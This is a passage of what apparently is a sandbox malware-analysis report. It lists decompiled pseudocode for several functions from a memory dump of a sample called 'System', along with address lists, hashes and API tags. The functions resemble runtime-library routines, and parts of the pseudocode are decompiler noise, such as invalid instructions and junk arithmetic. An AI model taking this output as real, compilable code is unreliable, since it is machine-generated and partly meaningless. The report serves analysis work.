				if (_t231 - 0x10 < 0) goto 0xe4c58963;
				_t16 = _t267 - 0x39; // 0x4850ec83485340cc
				if (_t231 + 1 - 0x1000 < 0) goto 0xe4c5895e;
				if ( *_t16 -  *((intOrPtr*)( *_t16 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c58c91;
				0xe4c623d0();
				asm("movups xmm0, [ebp-0x19]");
				asm("movups [ebp-0x39], xmm0");
				asm("movups xmm1, [ebp-0x9]");
				asm("movups [ebp-0x29], xmm1");
				_t18 = _t267 - 0x21; // 0x44c7482024448948
				_t19 = _t267 - 0x29; // 0xc0334024448948c4
				_t234 =  *_t19;
				if ( *((long long*)(_t263 + 0x18)) - 0x10 < 0) goto 0xe4c58988;
				_t264 =  *((intOrPtr*)(_t263 + 0x10));
				if (_t264 -  *_t18 - _t234 > 0) goto 0xe4c589c3;
				_t167 = _t264 + _t234;
				 *((long long*)(_t267 - 0x29)) = _t167;
				_t24 = _t267 - 0x39; // 0x7ff6e4c586df
				_t25 = _t267 - 0x39; // 0x4850ec83485340cc
				_t191 =  >=  ?  *_t25 : _t24;
				_t192 = ( >=  ?  *_t25 : _t24) + _t234;
				E00007FF67FF6E4C64380();
				 *((char*)(_t264 + ( >=  ?  *_t25 : _t24) + _t234)) = 0;
				goto 0xe4c589d7;
				 *((long long*)(_t270 + 0x20)) = _t264;
				r8d = 0;
				_t28 = _t267 - 0x39; // 0x7ff6e4c586df
				E00007FF67FF6E4C4CA80(_t28, _t264, _t259,  *_t263, _t283, __r15);
				_t29 = _t267 - 0x39; // 0x7ff6e4c586df
				_t31 = _t267 - 0x39; // 0x4850ec83485340cc
				_t205 =  >=  ?  *_t31 : _t29;
				_t32 = _t267 - 0x19; // 0x7ff6e4c586ff
				_t104 = E00007FF67FF6E4C6CF94(_t116, r14d, _t167, ( >=  ?  *_t25 : _t24) + _t234,  >=  ?  *_t31 : _t29, _t32, _t259, _t264,  *_t263);
				_t130 = _t167 - 0xffffffff;
				if (_t130 == 0) goto 0xe4c58a22;
				_t33 = _t267 - 0x13; // 0x2444883024448948
				_t168 =  *_t33 & 0x0000ffff;
				if (_t130 == 0) goto 0xe4c58a22;
				_t34 = _t267 - 0x39; // 0x7ff6e4c586df
				_t36 = _t267 - 0x39; // 0x4850ec83485340cc
				_t207 =  >=  ?  *_t36 : _t34;
				 *((intOrPtr*)(_t267 - 0x4cf88a40)) =  *((intOrPtr*)(_t267 - 0x4cf88a40)) + (_t104 >> 0x0000000e & 0x00000001);
				_t208 = ( >=  ?  *_t36 : _t34) + _t267;
				asm("stc");
				 *_t168 =  *_t168 + _t168;
				 *((intOrPtr*)(_t168 - 0x7d)) =  *((intOrPtr*)(_t168 - 0x7d)) + _t116;
				if ( *((long long*)(_t267 - 0x21)) - 0x10 > 0) goto 0xe4c58a36;
				 *((intOrPtr*)(_t264 + _t267 + 0x48)) =  *((intOrPtr*)(_t264 + _t267 + 0x48)) + sil;
				_t107 = E00007FF67FF6E4C59090(_t259);
				if (_t107 == 0) goto 0xe4c58a50;
				if ( *((long long*)(_t259 + 0x18)) - 0x10 < 0) goto 0xe4c58a3f;
				 *((intOrPtr*)( *_t259 + 1)) =  *((intOrPtr*)( *_t259 + 1)) - _t107;
				 *((intOrPtr*)(_t267 + 0x320774c0)) =  *((intOrPtr*)(_t267 + 0x320774c0)) + _t107;
				asm("fucomi st0, st1");
				asm("les eax, [ecx]");
				 *_t168 =  *_t168 + _t168;
				 *((intOrPtr*)(_t168 - 0x73)) =  *((intOrPtr*)(_t168 - 0x73)) + _t116;
				asm("invalid");
				E00007FF67FF6E4C590F0(_t118, ( >=  ?  *_t25 : _t24) + _t234, _t267 - 0x19, 0x2, _t264);
				_t193 = _t168;
				_t53 = _t267 - 0x39; // 0x7ff6e4c586df
				if (_t53 == _t193) goto 0xe4c58ad9;
				_t54 = _t267 - 0x21; // 0x44c7482024448948
				_t240 =  *_t54;
				if (_t240 - 0x10 < 0) goto 0xe4c58aab;
				_t55 = _t267 - 0x39; // 0x4850ec83485340cc
				if (_t240 + 1 - 0x1000 < 0) goto 0xe4c58aa6;
				if ( *_t55 -  *((intOrPtr*)( *_t55 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c58c85;
				0xe4c623d0();
				 *((long long*)(_t267 - 0x29)) = _t283;
				 *((long long*)(_t267 - 0x21)) = 0xf;
				 *((char*)(_t267 - 0x39)) = 0;
				asm("movups xmm0, [ebx]");
				asm("movups [ebp-0x39], xmm0");
				asm("movups xmm1, [ebx+0x10]");
				asm("movups [ebp-0x29], xmm1");
				 *((long long*)(_t193 + 0x10)) = _t283;
				 *((long long*)(_t193 + 0x18)) = 0xf;
				 *_t193 = 0;
				_t62 = _t267 - 1; // 0x24548b48d8b60f00
				_t243 =  *_t62;
				if (_t243 - 0x10 < 0) goto 0xe4c58b14;
				_t63 = _t267 - 0x19; // 0x89480000000f3824
				if (_t243 + 1 - 0x1000 < 0) goto 0xe4c58b0f;
				_t175 =  *_t63 -  *((intOrPtr*)( *_t63 - 8)) + 0xfffffff8;
				if (_t175 - 0x1f > 0) goto 0xe4c58c85;
				0xe4c623d0();
				_t65 = _t267 - 0x39; // 0x7ff6e4c586df
				_t66 = _t267 + 0x17; // 0x7ff6e4c5872f
				E00007FF67FF6E4C58CA0(r14d, _t118, _t66, _t65, _t264, _t264, _t281, _t282, _t283, _t285);
				_t176 = _t175;
				if ( *((long long*)(_t267 + 0x27)) == 0) goto 0xe4c58bb8;
				_t69 = _t267 + 0x17; // 0x7ff6e4c5872f
				_t71 = _t267 + 0x17; // 0x1000fa8148c18b
				_t217 =  >=  ?  *_t71 : _t69;
				_t72 = _t267 - 0x19; // 0x7ff6e4c586ff
				E00007FF67FF6E4C6CF94(_t116, r14d, _t176, _t193,  >=  ?  *_t71 : _t69, _t72,  *_t259, _t264,  *_t263, _t267, _t266);
				_t143 = _t176 - 0xffffffff;
				if (_t143 == 0) goto 0xe4c58b5b;
				asm("bt ax, 0xf");
				if (_t143 < 0) goto 0xe4c58bb8;
				asm("bt ax, 0xe");
				if (_t143 < 0) goto 0xe4c58bb8;
				 *((long long*)(_t267 - 0x19)) = _t283;
				 *((long long*)(_t267 - 1)) = 0xf;
				 *((long long*)(_t267 - 9)) = _t283;
				 *((char*)(_t267 - 0x19)) = 0;
				_t78 = _t267 - 0x19; // 0x7ff6e4c586ff
				_t79 = _t267 + 0x17; // 0x7ff6e4c5872f
				E00007FF67FF6E4C58870(_t193, _t79, _t78, _t264, _t285);
				_t81 = _t267 - 1; // 0x24548b48d8b60f00
				_t249 =  *_t81;
				if (_t249 - 0x10 < 0) goto 0xe4c58bb8;
				_t82 = _t267 - 0x19; // 0x89480000000f3824
				if (_t249 + 1 - 0x1000 < 0) goto 0xe4c58bb3;
				if ( *_t82 -  *((intOrPtr*)( *_t82 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c58c8b;
				0xe4c623d0();
				_t84 = _t267 - 0x39; // 0x7ff6e4c586df
				_t86 = _t267 - 0x39; // 0x4850ec83485340cc
				_t222 =  >=  ?  *_t86 : _t84;
				_t112 = E00007FF67FF6E4C6D094(_t114, _t116,  *_t82 -  *((intOrPtr*)( *_t82 - 8)) + 0xfffffff8, _t193,  >=  ?  *_t86 : _t84, _t249 + 0x28,  *_t259, _t264,  *_t263);
				_t89 = _t267 + 0x2f; // 0x1b771ff88348f8c0
				_t252 =  *_t89;
				if (_t252 - 0x10 < 0) goto 0xe4c58c0b;
				_t90 = _t267 + 0x17; // 0x1000fa8148c18b
				if (_t252 + 1 - 0x1000 < 0) goto 0xe4c58c06;
				if ( *_t90 -  *((intOrPtr*)( *_t90 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c58c91;
				0xe4c623d0();
				 *((long long*)(_t267 + 0x27)) = _t283;
				 *((long long*)(_t267 + 0x2f)) = 0xf;
				 *((char*)(_t267 + 0x17)) = 0;
				_t95 = _t267 - 0x21; // 0x44c7482024448948
				_t255 =  *_t95;
				if (_t255 - 0x10 < 0) goto 0xe4c58c52;
				_t96 = _t267 - 0x39; // 0x4850ec83485340cc
				if (_t255 + 1 - 0x1000 < 0) goto 0xe4c58c4d;
				if ( *_t96 -  *((intOrPtr*)( *_t96 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c58c79;
				0xe4c623d0();
				_t98 = _t267 + 0x37; // 0xc3b60f00009c7ce8
				return E00007FF67FF6E4C623B0(_t112, _t116,  *_t98 ^ _t270);
			}









































                                                                                                                                                              0x7ff6e4c58870
                                                                                                                                                              0x7ff6e4c58870
                                                                                                                                                              0x7ff6e4c58875
                                                                                                                                                              0x7ff6e4c5887e
                                                                                                                                                              0x7ff6e4c58883
                                                                                                                                                              0x7ff6e4c5888a
                                                                                                                                                              0x7ff6e4c58894
                                                                                                                                                              0x7ff6e4c58898
                                                                                                                                                              0x7ff6e4c5889b
                                                                                                                                                              0x7ff6e4c5889e
                                                                                                                                                              0x7ff6e4c588a1
                                                                                                                                                              0x7ff6e4c588a8
                                                                                                                                                              0x7ff6e4c588b5
                                                                                                                                                              0x7ff6e4c588bc
                                                                                                                                                              0x7ff6e4c588c3
                                                                                                                                                              0x7ff6e4c588c9
                                                                                                                                                              0x7ff6e4c588e0
                                                                                                                                                              0x7ff6e4c588ed
                                                                                                                                                              0x7ff6e4c58901
                                                                                                                                                              0x7ff6e4c58909
                                                                                                                                                              0x7ff6e4c5890e
                                                                                                                                                              0x7ff6e4c58913
                                                                                                                                                              0x7ff6e4c5891b
                                                                                                                                                              0x7ff6e4c5891f
                                                                                                                                                              0x7ff6e4c58923
                                                                                                                                                              0x7ff6e4c58928
                                                                                                                                                              0x7ff6e4c58928
                                                                                                                                                              0x7ff6e4c58930
                                                                                                                                                              0x7ff6e4c58935
                                                                                                                                                              0x7ff6e4c58943
                                                                                                                                                              0x7ff6e4c58958
                                                                                                                                                              0x7ff6e4c5895e
                                                                                                                                                              0x7ff6e4c58963
                                                                                                                                                              0x7ff6e4c58967
                                                                                                                                                              0x7ff6e4c5896b
                                                                                                                                                              0x7ff6e4c5896f
                                                                                                                                                              0x7ff6e4c58973
                                                                                                                                                              0x7ff6e4c58977
                                                                                                                                                              0x7ff6e4c58977
                                                                                                                                                              0x7ff6e4c58983
                                                                                                                                                              0x7ff6e4c58988
                                                                                                                                                              0x7ff6e4c58995
                                                                                                                                                              0x7ff6e4c58997
                                                                                                                                                              0x7ff6e4c5899b
                                                                                                                                                              0x7ff6e4c5899f
                                                                                                                                                              0x7ff6e4c589a7
                                                                                                                                                              0x7ff6e4c589a7
                                                                                                                                                              0x7ff6e4c589ac
                                                                                                                                                              0x7ff6e4c589b8
                                                                                                                                                              0x7ff6e4c589bd
                                                                                                                                                              0x7ff6e4c589c1
                                                                                                                                                              0x7ff6e4c589c3
                                                                                                                                                              0x7ff6e4c589c8
                                                                                                                                                              0x7ff6e4c589ce
                                                                                                                                                              0x7ff6e4c589d2
                                                                                                                                                              0x7ff6e4c589d7
                                                                                                                                                              0x7ff6e4c589e0
                                                                                                                                                              0x7ff6e4c589e0
                                                                                                                                                              0x7ff6e4c589e5
                                                                                                                                                              0x7ff6e4c589e9
                                                                                                                                                              0x7ff6e4c589ee
                                                                                                                                                              0x7ff6e4c589f1
                                                                                                                                                              0x7ff6e4c589f3
                                                                                                                                                              0x7ff6e4c589f3
                                                                                                                                                              0x7ff6e4c589fd
                                                                                                                                                              0x7ff6e4c589ff
                                                                                                                                                              0x7ff6e4c58a08
                                                                                                                                                              0x7ff6e4c58a08
                                                                                                                                                              0x7ff6e4c58a16
                                                                                                                                                              0x7ff6e4c58a1c
                                                                                                                                                              0x7ff6e4c58a1e
                                                                                                                                                              0x7ff6e4c58a1f
                                                                                                                                                              0x7ff6e4c58a21
                                                                                                                                                              0x7ff6e4c58a24
                                                                                                                                                              0x7ff6e4c58a26
                                                                                                                                                              0x7ff6e4c58a2c
                                                                                                                                                              0x7ff6e4c58a33
                                                                                                                                                              0x7ff6e4c58a3a
                                                                                                                                                              0x7ff6e4c58a48
                                                                                                                                                              0x7ff6e4c58a4b
                                                                                                                                                              0x7ff6e4c58a51
                                                                                                                                                              0x7ff6e4c58a53
                                                                                                                                                              0x7ff6e4c58a54
                                                                                                                                                              0x7ff6e4c58a56
                                                                                                                                                              0x7ff6e4c58a5a
                                                                                                                                                              0x7ff6e4c58a5f
                                                                                                                                                              0x7ff6e4c58a64
                                                                                                                                                              0x7ff6e4c58a67
                                                                                                                                                              0x7ff6e4c58a6e
                                                                                                                                                              0x7ff6e4c58a70
                                                                                                                                                              0x7ff6e4c58a70
                                                                                                                                                              0x7ff6e4c58a78
                                                                                                                                                              0x7ff6e4c58a7d
                                                                                                                                                              0x7ff6e4c58a8b
                                                                                                                                                              0x7ff6e4c58aa0
                                                                                                                                                              0x7ff6e4c58aa6
                                                                                                                                                              0x7ff6e4c58aab
                                                                                                                                                              0x7ff6e4c58aaf
                                                                                                                                                              0x7ff6e4c58ab7
                                                                                                                                                              0x7ff6e4c58abb
                                                                                                                                                              0x7ff6e4c58abe
                                                                                                                                                              0x7ff6e4c58ac2
                                                                                                                                                              0x7ff6e4c58ac6
                                                                                                                                                              0x7ff6e4c58aca
                                                                                                                                                              0x7ff6e4c58ace
                                                                                                                                                              0x7ff6e4c58ad6
                                                                                                                                                              0x7ff6e4c58ad9
                                                                                                                                                              0x7ff6e4c58ad9
                                                                                                                                                              0x7ff6e4c58ae1
                                                                                                                                                              0x7ff6e4c58ae6
                                                                                                                                                              0x7ff6e4c58af4
                                                                                                                                                              0x7ff6e4c58b01
                                                                                                                                                              0x7ff6e4c58b09
                                                                                                                                                              0x7ff6e4c58b0f
                                                                                                                                                              0x7ff6e4c58b14
                                                                                                                                                              0x7ff6e4c58b18
                                                                                                                                                              0x7ff6e4c58b1c
                                                                                                                                                              0x7ff6e4c58b21
                                                                                                                                                              0x7ff6e4c58b27
                                                                                                                                                              0x7ff6e4c58b2d
                                                                                                                                                              0x7ff6e4c58b36
                                                                                                                                                              0x7ff6e4c58b36
                                                                                                                                                              0x7ff6e4c58b3b
                                                                                                                                                              0x7ff6e4c58b3f
                                                                                                                                                              0x7ff6e4c58b44
                                                                                                                                                              0x7ff6e4c58b47
                                                                                                                                                              0x7ff6e4c58b4d
                                                                                                                                                              0x7ff6e4c58b52
                                                                                                                                                              0x7ff6e4c58b54
                                                                                                                                                              0x7ff6e4c58b59
                                                                                                                                                              0x7ff6e4c58b5b
                                                                                                                                                              0x7ff6e4c58b5f
                                                                                                                                                              0x7ff6e4c58b67
                                                                                                                                                              0x7ff6e4c58b6b
                                                                                                                                                              0x7ff6e4c58b6f
                                                                                                                                                              0x7ff6e4c58b73
                                                                                                                                                              0x7ff6e4c58b77
                                                                                                                                                              0x7ff6e4c58b7d
                                                                                                                                                              0x7ff6e4c58b7d
                                                                                                                                                              0x7ff6e4c58b85
                                                                                                                                                              0x7ff6e4c58b8a
                                                                                                                                                              0x7ff6e4c58b98
                                                                                                                                                              0x7ff6e4c58bad
                                                                                                                                                              0x7ff6e4c58bb3
                                                                                                                                                              0x7ff6e4c58bb8
                                                                                                                                                              0x7ff6e4c58bc1
                                                                                                                                                              0x7ff6e4c58bc1
                                                                                                                                                              0x7ff6e4c58bc6
                                                                                                                                                              0x7ff6e4c58bd0
                                                                                                                                                              0x7ff6e4c58bd0
                                                                                                                                                              0x7ff6e4c58bd8
                                                                                                                                                              0x7ff6e4c58bdd
                                                                                                                                                              0x7ff6e4c58beb
                                                                                                                                                              0x7ff6e4c58c00
                                                                                                                                                              0x7ff6e4c58c06
                                                                                                                                                              0x7ff6e4c58c0b
                                                                                                                                                              0x7ff6e4c58c0f
                                                                                                                                                              0x7ff6e4c58c17
                                                                                                                                                              0x7ff6e4c58c1b
                                                                                                                                                              0x7ff6e4c58c1b
                                                                                                                                                              0x7ff6e4c58c23
                                                                                                                                                              0x7ff6e4c58c28
                                                                                                                                                              0x7ff6e4c58c36
                                                                                                                                                              0x7ff6e4c58c4b
                                                                                                                                                              0x7ff6e4c58c4d
                                                                                                                                                              0x7ff6e4c58c55
                                                                                                                                                              0x7ff6e4c58c78

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3668304517-0
                                                                                                                                                              • Opcode ID: 4434a263596658d5613e519ef45f05c8eb65b8f0c989d697cf7143f8f8aed85f
                                                                                                                                                              • Instruction ID: 10df32fc72a72db75b0a3d0719844669468dd92b9d4c347de3e20799536e8227
                                                                                                                                                              • Opcode Fuzzy Hash: 4434a263596658d5613e519ef45f05c8eb65b8f0c989d697cf7143f8f8aed85f
                                                                                                                                                              • Instruction Fuzzy Hash: 4FC19067F54A4285FB10DB75E0843BC2371AB04B98F404632DA6E93ADADF7DE091C35A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C7AEA0 Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 97%
                                                                                                                                                              			E00007FF67FF6E4C7AEA0(signed int __edx, void* __edi, void* __rcx, void* __rdx, intOrPtr _a40, intOrPtr _a48, long long _a56) {
				signed int _v80;
				long long _v92;
				long long _v100;
				intOrPtr _v104;
				signed long long _v112;
				intOrPtr _v116;
				char _v120;
				long long _v124;
				char _v128;
				char _v132;
				signed int _v136;
				void* _t51;
				void* _t53;
				void* _t64;
				void* _t66;
				void* _t67;
				signed int _t68;
				signed long long _t96;
				void* _t99;
				intOrPtr _t104;
				long long* _t106;
				long long _t108;
				signed long long _t138;
				void* _t142;
				void* _t146;

				_t96 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_v80 = _t96 ^ _t146 - 0x00000078;
				_t108 = __rcx - 0x76c;
				_v136 = r9d;
				_t138 = __edx;
				if (_t108 - 0x46 < 0) goto 0xe4c7b088;
				if (_t108 - 0x44d > 0) goto 0xe4c7b088;
				r15d = __edx - 1;
				if (r15d - 0xb > 0) goto 0xe4c7b088;
				if (r8d <= 0) goto 0xe4c7b088;
				_t99 =  *((intOrPtr*)(0xe4c9e3f0 + __edx * 4)) -  *((intOrPtr*)(0xe4c9e3f0 + __edx * 4 - 4));
				if (r8d - _t51 <= 0) goto 0xe4c7af41;
				if (E00007FF67FF6E4C71634(_t67, r8d - _t51) == 0) goto 0xe4c7b088;
				if (_t138 != 2) goto 0xe4c7b088;
				if (_t142 - 0x1d > 0) goto 0xe4c7b088;
				if (_v136 - 0x17 > 0) goto 0xe4c7b088;
				if (r13d - 0x3b > 0) goto 0xe4c7b088;
				if (r12d - 0x3b > 0) goto 0xe4c7b088;
				_t53 = E00007FF67FF6E4C71634(_t67, r12d - 0x3b);
				r14d = 0;
				if (_t53 == 0) goto 0xe4c7af78;
				if (_t138 - 2 <= 0) goto 0xe4c7af78;
				E00007FF67FF6E4C7D8FC(_t99);
				_v124 = r14d;
				_v128 = r14d;
				_v132 = r14d;
				E00007FF67FF6E4C7CEC8(_t99,  &_v124);
				if (_t99 != 0) goto 0xe4c7b0b4;
				E00007FF67FF6E4C7CEF8(_t99,  &_v128);
				if (_t99 != 0) goto 0xe4c7b0b4;
				E00007FF67FF6E4C7CF28(_t99,  &_v132);
				if (_t99 != 0) goto 0xe4c7b0b4;
				r8d = _t108 - 1;
				r10d = 0x51eb851f;
				r9d = r10d * (_t108 + 0x12b) >> 0x20;
				r9d = r9d >> 7;
				_t68 = r9d;
				r9d = r9d + _t68;
				r9d = r9d - (r10d * r8d >> 0x20);
				asm("cdq");
				_t104 = _v132;
				if (_a56 == 1) goto 0xe4c7b083;
				_v92 = _t142 +  *((intOrPtr*)(0xe4c9e3f0 + _t138 * 4 - 4)) + 1;
				_v100 = _t108;
				_v104 = r15d;
				_v112 = r8d;
				_v116 = r13d;
				_v120 = r12d;
				if (_a56 != 0xffffffff) goto 0xe4c7b07e;
				if (_v124 == 0) goto 0xe4c7b07e;
				E00007FF67FF6E4C7D93C( &_v120);
				if (_t104 != 0) goto 0xe4c7b083;
				goto 0xe4c7b097;
				_t106 = _v128 + ((_v136 + (_t68 + r9d + (_t66 - 0x46) * 0x16d + r8d + (_t68 + r9d + (_t66 - 0x46) * 0x16d + r8d) * 2) * 8) * 0x3c + _a40) * 0x3c + _t104 + _a48;
				goto 0xe4c7b097;
				_t64 = E00007FF67FF6E4C6C854(_t106);
				 *_t106 = 0x16;
				return E00007FF67FF6E4C623B0(_t64, _t68 + r9d, _v80 ^ _t146 - 0x00000078);
			}




























                                                                                                                                                              0x7ff6e4c7aeb4
                                                                                                                                                              0x7ff6e4c7aebe
                                                                                                                                                              0x7ff6e4c7aec6
                                                                                                                                                              0x7ff6e4c7aed3
                                                                                                                                                              0x7ff6e4c7aed7
                                                                                                                                                              0x7ff6e4c7aedd
                                                                                                                                                              0x7ff6e4c7aee9
                                                                                                                                                              0x7ff6e4c7aeef
                                                                                                                                                              0x7ff6e4c7aef7
                                                                                                                                                              0x7ff6e4c7af00
                                                                                                                                                              0x7ff6e4c7af10
                                                                                                                                                              0x7ff6e4c7af17
                                                                                                                                                              0x7ff6e4c7af22
                                                                                                                                                              0x7ff6e4c7af2b
                                                                                                                                                              0x7ff6e4c7af34
                                                                                                                                                              0x7ff6e4c7af45
                                                                                                                                                              0x7ff6e4c7af4f
                                                                                                                                                              0x7ff6e4c7af59
                                                                                                                                                              0x7ff6e4c7af65
                                                                                                                                                              0x7ff6e4c7af6a
                                                                                                                                                              0x7ff6e4c7af6f
                                                                                                                                                              0x7ff6e4c7af74
                                                                                                                                                              0x7ff6e4c7af78
                                                                                                                                                              0x7ff6e4c7af81
                                                                                                                                                              0x7ff6e4c7af85
                                                                                                                                                              0x7ff6e4c7af89
                                                                                                                                                              0x7ff6e4c7af8d
                                                                                                                                                              0x7ff6e4c7af94
                                                                                                                                                              0x7ff6e4c7af9e
                                                                                                                                                              0x7ff6e4c7afa5
                                                                                                                                                              0x7ff6e4c7afaf
                                                                                                                                                              0x7ff6e4c7afb6
                                                                                                                                                              0x7ff6e4c7afc6
                                                                                                                                                              0x7ff6e4c7afca
                                                                                                                                                              0x7ff6e4c7afd8
                                                                                                                                                              0x7ff6e4c7afde
                                                                                                                                                              0x7ff6e4c7afe9
                                                                                                                                                              0x7ff6e4c7aff2
                                                                                                                                                              0x7ff6e4c7affc
                                                                                                                                                              0x7ff6e4c7afff
                                                                                                                                                              0x7ff6e4c7b029
                                                                                                                                                              0x7ff6e4c7b04d
                                                                                                                                                              0x7ff6e4c7b053
                                                                                                                                                              0x7ff6e4c7b056
                                                                                                                                                              0x7ff6e4c7b059
                                                                                                                                                              0x7ff6e4c7b05d
                                                                                                                                                              0x7ff6e4c7b061
                                                                                                                                                              0x7ff6e4c7b065
                                                                                                                                                              0x7ff6e4c7b069
                                                                                                                                                              0x7ff6e4c7b06f
                                                                                                                                                              0x7ff6e4c7b075
                                                                                                                                                              0x7ff6e4c7b07c
                                                                                                                                                              0x7ff6e4c7b081
                                                                                                                                                              0x7ff6e4c7b083
                                                                                                                                                              0x7ff6e4c7b086
                                                                                                                                                              0x7ff6e4c7b088
                                                                                                                                                              0x7ff6e4c7b08d
                                                                                                                                                              0x7ff6e4c7b0b3

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                              • Opcode ID: dd9dc72751b09c8d9aa494fc87a6c4204851a184f869a226b8eca5e03e5dd889
                                                                                                                                                              • Instruction ID: f90a1a6665aeadaca88470e7d4dfb8b5df129319774a0ca87841da2fccd8ee23
                                                                                                                                                              • Opcode Fuzzy Hash: dd9dc72751b09c8d9aa494fc87a6c4204851a184f869a226b8eca5e03e5dd889
                                                                                                                                                              • Instruction Fuzzy Hash: ED51D3B7F482138BEB24CB74D9C93BC2671AB40B5CF500136EA1D93AD5DE3AA5068706
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C83C14 Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                              			E00007FF67FF6E4C83C14(void* __edx, void* __eflags, signed int __rax, long long __rbx, signed char* __rcx, long long __rbp, long long _a8, char _a16, long long _a24) {
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t37;
				signed int _t38;
				signed int _t39;
				signed char _t43;
				void* _t48;
				void* _t55;
				signed int _t62;
				signed long long _t68;
				signed char _t85;
				signed long long _t88;
				signed long long _t89;

				_a8 = __rbx;
				_a24 = __rbp;
				 *__rcx = 0;
				r14d = r9d;
				_t89 = _t88;
				if (__eflags == 0) goto 0xe4c83c65;
				_t48 = _t88 - 1;
				if (_t48 == 0) goto 0xe4c83c5e;
				E00007FF67FF6E4C6C854(__rax);
				 *__rax = 0x16;
				_t32 = E00007FF67FF6E4C6A5D8();
				goto 0xe4c83c8e;
				 *__rax =  *__rax + _t32;
				asm("pop es");
				 *_t89 =  *_t89 + _t43;
				asm("rol dword [eax-0xa], 0xc7");
				 *_t89 =  *_t89 | _t43;
				 *_t88 =  *_t88 << 0xc8;
				asm("sbb ecx, ecx");
				goto 0xe4c83c8e;
				_t33 = _t32 + 0xba;
				 *_t89 =  *_t89 + _t33;
				 *__rax =  *__rax + _t33;
				_t68 = __rax & _t88;
				if (_t48 == 0) goto 0xe4c83cfd;
				if (_t68 == 0x100) goto 0xe4c83cf6;
				if (_t68 == 0x200) goto 0xe4c83cef;
				if (_t68 == 0x300) goto 0xe4c83ce8;
				if (_t68 == 0x400) goto 0xe4c83cfd;
				if (_t68 == 0x500) goto 0xe4c83ce1;
				if (_t68 == 0x600) goto 0xe4c83cef;
				_t55 = _t68 - _t88;
				if (_t55 == 0) goto 0xe4c83ce1;
				E00007FF67FF6E4C6C854(_t68);
				 *_t68 = 0x16;
				_t35 = E00007FF67FF6E4C6A5D8();
				_t85 = __rcx[4];
				goto 0xe4c83d02;
				 *0x1 =  *0x1 + _t35;
				asm("adc edi, [eax+0x5]");
				goto 0xe4c83d02;
				 *0x4 =  *0x4 + _t35;
				 *((intOrPtr*)(_t85 - 0x127cf7bd)) =  *((intOrPtr*)(_t85 - 0x127cf7bd)) +  ~_t43;
				asm("adc [ecx+ecx*2-0x7d], dh");
				asm("in eax, dx");
				asm("adc [ebp+edi-0x7d], dh");
				asm("in eax, dx");
				asm("adc [ecx+esi-0x7d], dh");
				asm("in eax, dx");
				asm("adc [ebp-0x7d], dh");
				asm("std");
				if (_t55 == 0) goto 0xe4c83d30;
				E00007FF67FF6E4C6C854(0x4);
				 *0x4 = 0x16;
				_t37 = E00007FF67FF6E4C6A5D8();
				goto 0xe4c83d55;
				sil = _t85 == 0x80000000;
				goto 0xe4c83d55;
				 *0x4 =  *0x4 + _t37;
				 *0x2BE10EB00000004 =  *0x2BE10EB00000004 | _t89;
				goto 0xe4c83d55;
				__rcx[0x14] = __rcx[0x14] & 0x00000000;
				__rcx[0xc] = 0;
				__rcx[0x10] = 0x80;
				if (dil >= 0) goto 0xe4c83d6b;
				 *__rcx =  *__rcx | 0x00000010;
				if ((_t89 & 0x00074000) != 0) goto 0xe4c83d90;
				_t38 = E00007FF67FF6E4C72B1C(0x4,  &_a16);
				if (0x4 != 0) goto 0xe4c83e08;
				if (_a16 == 0x8000) goto 0xe4c83d93;
				 *__rcx =  *__rcx | 0x00000080;
				_t39 = _t38 & r14d;
				if (_t39 < 0) goto 0xe4c83db2;
				__rcx[0x10] = 1;
				_t62 = dil & 0x00000040;
				if (_t62 == 0) goto 0xe4c83dc6;
				asm("bts dword [ebx+0x14], 0x1a");
				asm("bts dword [ebx+0x4], 0x10");
